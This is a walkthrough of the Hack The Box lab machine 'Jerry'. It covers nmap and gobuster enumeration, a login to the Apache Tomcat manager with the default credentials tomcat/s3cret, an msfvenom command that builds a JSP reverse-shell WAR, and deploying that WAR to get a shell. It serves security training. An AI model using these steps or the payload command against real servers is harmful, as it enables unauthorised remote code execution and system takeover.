# Hack The Box - Jerry Walkthrough without Metasploit ![Jerry](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MPnhNLcu7d6QEAT163e%2F-MPp0WiGhktuiaLuQZTe%2Fimage.png?alt=media\&token=387838b7-dbcb-4486-9672-f62fe215d8e7) ## Enumeration We will use the following nmap command to enumerate the box: ``` nmap -sC -sV 10.10.10.95 ``` ![Jerry Enumeration](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MPprM7ILqJNYLpxQKZp%2F-MPqB9PH55X9rBilq8Bi%2Fimage.png?alt=media\&token=596456bb-7379-4b41-aaba-2164d3a86bac) We can see that it only has one port open, the **8080** and that it is running **Tomcat/Coyote JSP engine 1.1** if we go to **10.10.10.95:8080** we are presented with the following page: ![Apache Tomcat 7.0.88](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MPsKyRYz2CssXvgLMOa%2F-MPs_Hd_Tpuc9ZVjlekp%2Fimage.png?alt=media\&token=b11f7712-6c2c-400a-aa70-8a680110eef1) Since what we have on port 8080 is accessible through web our next step in enumeration is **Gobuster** (or Dirbuster or any other web enumeration tool you prefer). {% embed url="" %} ### Gobuster We will run **Gobuster** with the following flags: -w: here we will specify the wordlist to use in our case the **directory-list-2.3-medium.txt** from dirbuster -t: number of threads in our case since its a CTF environment we will use 40, but for other cases its better to run it with a lower number. ``` gobuster dir -u http://10.10.10.95:8080/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -t 40 ``` ![Gobuster First Scan](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MPsKyRYz2CssXvgLMOa%2F-MPsl_F0F2i_4WKA6sDd%2Fimage.png?alt=media\&token=d28e164c-970f-4b29-b784-1ee65de4a6e8) On this first scan we found an interesting directory /manager, but if we run the scan one more time, this time with a different wordlist this time **common.txt** from **dirb/wordlists**: ![Gobuster Second Scan](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MPsKyRYz2CssXvgLMOa%2F-MPsm-yg2gN6UxcCfydB%2Fimage.png?alt=media\&token=2d4445d4-1912-4964-b735-d68b79809b80) We can see that this time we have more results, but the important one in this case **/manager** is in both scans, there are multiple lists deppending on what we are looking for. While trying to access the /manager page we are presented with this prompt to enter user and password: ![Manager User / Password](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MPsKyRYz2CssXvgLMOa%2F-MPsmaF4BLoO45NgsT-B%2Fimage.png?alt=media\&token=8734dbe6-8afe-40f2-a2e4-bb4c8e45581c) With a quick google search we find a list of default usernames and passwords for Tomcat installations: {% embed url="" %} Tomcat Default Credentials Combination {% endembed %} In our particular case the combination is: user: **tomcat** password: **s3cret** ### Tomcat Manager Interface Once we're in the Tomcat Manager Interface we can see at the bottom of the page the Server Information: ![Server Information](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MPsnY_V_U7yE69wNpmH%2F-MPsqiZ7OulF6TSB_cEo%2Fimage.png?alt=media\&token=3398c2c0-abfb-4c2e-8b2c-a28de033f360) Most of it we already know, but now we also know it's running on a **Windows Server 2012 R2** and its **amd64** On top we can see the current Tomcat Applications list: ![Tomcat Applications](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MPsnY_V_U7yE69wNpmH%2F-MPsp19UbvGCcVLB3eMn%2Fimage.png?alt=media\&token=c4ce98b1-754c-4395-8ebf-45c2a8d79d16) And what we're interested in, the option to deploy a **WAR** file: ![War File Deploy](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MPsnY_V_U7yE69wNpmH%2F-MPspXeEEcretdTDMT0T%2Fimage.png?alt=media\&token=a20ca467-ce21-4c88-8ef9-2fc77524b01a) ## Exploitation ### Creating the payload We are going to upload a reverse tcp shell created with **msfvenom** ``` msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war > evil.war ``` ![msfvenom payload](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MPsrodq4aY7YrXzMK67%2F-MPtbMqURYDf2HAWePwB%2Fimage.png?alt=media\&token=0c43e8c5-ef0b-41b3-bdf1-1eb9bfefdb6d) ### Uploading the payload Now we just upload the war using the Tomcat web application: ![Uploading evil.war](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MPsrodq4aY7YrXzMK67%2F-MPtbdJoFgomsCIbeywk%2Fimage.png?alt=media\&token=114b9635-1751-438a-b0ac-59b9d604a321) Once we have deployed it we will be able to see it in the lists of applications: ![Evil war deployed](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MPsrodq4aY7YrXzMK67%2F-MPtc7kQzCph4D1r4CqY%2Fimage.png?alt=media\&token=6ef1be49-26d0-4333-97ff-004bbe0f85c4) ### Executing the payload Set up a netcat listener: ![Netcat listener](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MPsrodq4aY7YrXzMK67%2F-MPtcMpNGaHSDDL-2NJE%2Fimage.png?alt=media\&token=ad7986e7-b8b3-44ac-98d1-65082a9b79f9) And now we just click on the /evil application on the tomcat applications list to get a shell back. ## Pwnd ![Jerry Pwnd](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MPsrodq4aY7YrXzMK67%2F-MPtcgaMHpgY8-zRyghK%2Fimage.png?alt=media\&token=6cd8aff5-ea75-4776-85a2-7d481156130d)